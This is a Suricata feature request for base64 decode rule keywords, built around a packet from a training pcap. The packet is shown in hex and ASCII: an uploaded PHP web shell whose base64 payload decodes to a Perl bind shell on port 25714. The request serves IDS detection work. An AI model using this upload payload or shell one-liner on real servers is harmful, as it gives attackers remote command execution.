Feature #380
Updated by Victor Julien almost 12 years ago
I think it is important for Suricata to support Base64 decode/data rule keywords (a few of them). Ex - Everything below comes from www.itoc.usma.edu/research/dataset/data/2009-04-20-09-05-46.dmp in general - that is a 156 M pcap with over 1 million packets. That traffic is really bad, SYN and ACK out of order, windows sizes are just anyway they feel to be and so on - normal it's "bad" traffic.Things like : 6 [1:22100005:1] SURICATA STREAM 3way handshake SYNACK resend with different seq 2 [1:22100015:1] SURICATA STREAM CLOSEWAIT ACK out of window 112 [1:22100020:1] SURICATA STREAM ESTABLISHED packet out of window 8 [1:22100021:1] SURICATA STREAM ESTABLISHED packet before last ack 26 [1:22100022:1] SURICATA STREAM ESTABLISHED SYNACK resend 12 [1:22100031:1] SURICATA STREAM FIN1 ack with wrong seq 2 [1:22100034:1] SURICATA STREAM FIN2 ack with wrong seq 8 [1:22100035:1] SURICATA STREAM FIN2 FIN with wrong seq 31 [1:22100037:1] SURICATA STREAM FIN recv but no session 274 [1:22100039:1] SURICATA STREAM Last ACK with wrong seq 73 [1:22100041:1] SURICATA STREAM RST recv but no session 927 [1:22100042:1] SURICATA STREAM TIMEWAIT ACK with wrong seq 3741 [1:22100045:1] SURICATA STREAM Packet with invalid ack 3741 [1:22100046:1] SURICATA STREAM RST invalid ack 4 [1:22100047:1] SURICATA STREAM reassembly segment before base seq pcap 22to35.pcap attached. In it (packet #12 - if you open it with wireshark) This below is the hex data in packet #12 from 22to35.pcap <pre> 3b205048505345535349443d5b2a5d204572726f722072657472696576696e6720636f6f6b6965210a0d0a436f6e74656e742d4c656e6774683a203338350d0a0d0a2d2d6432746d53490d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d227573657266696c65223b2066696c656e616d653d224f624879644269353157677230636a48514936752e706870220d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a0d0a3c3f7068702073797374656d286261736536345f6465636f64652827634756796243417454556c504943316c4943636b6344316d62334a724b436b375a586870644378705a6952774f33646f6157786c4b43526a5057356c6479424a547a6f365532396a613256304f6a704a546b56554b4578765932467355473979644377794e5463784e4378535a58567a5a5377784c4578706333526c62696b74506d466a5932567764436c374a483474506d5a6b6233426c6269676b597978334b5474545645524a5469302b5a6d5276634756754b43526a4c4849704f334e356333526c625352664948646f6157786c504435394a773d3d2729293f3e0d0a2d2d6432746d53492d2d </pre> This below is the same data into text (ASCII) <pre> (ascii) - (##) used as a delimeter ## ; PHPSESSID=[*] Error retrieving cookie! ##here at the end most likely there is missing colon, maybe... Content-Length: 385 --d2tmSI Content-Disposition: form-data; name="userfile"; filename="ObHydBi51Wgr0cjHQI6u.php" Content-Type: text/plain <?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwO3doaWxlKCRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTcxNCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdCl7JH4tPmZkb3BlbigkYyx3KTtTVERJTi0+ZmRvcGVuKCRjLHIpO3N5c3RlbSRfIHdoaWxlPD59Jw=='))?> --d2tmSI-- </pre> ## This below is the decoded (from base 64) to asci data in the "php system(base64_decode..." function <pre> ## perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,25714,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}' </pre> ## or the attack itself, since this is a pcap from the cyber games/trainings. We could effectively still search for the data using rules, but we have to covert text to base64 and use it as "content" and it gets tricky. It would be much easier if we have base64 decode keyword, since there are a lot of on-line apps that use base64. packet #7 is the same thing. thanks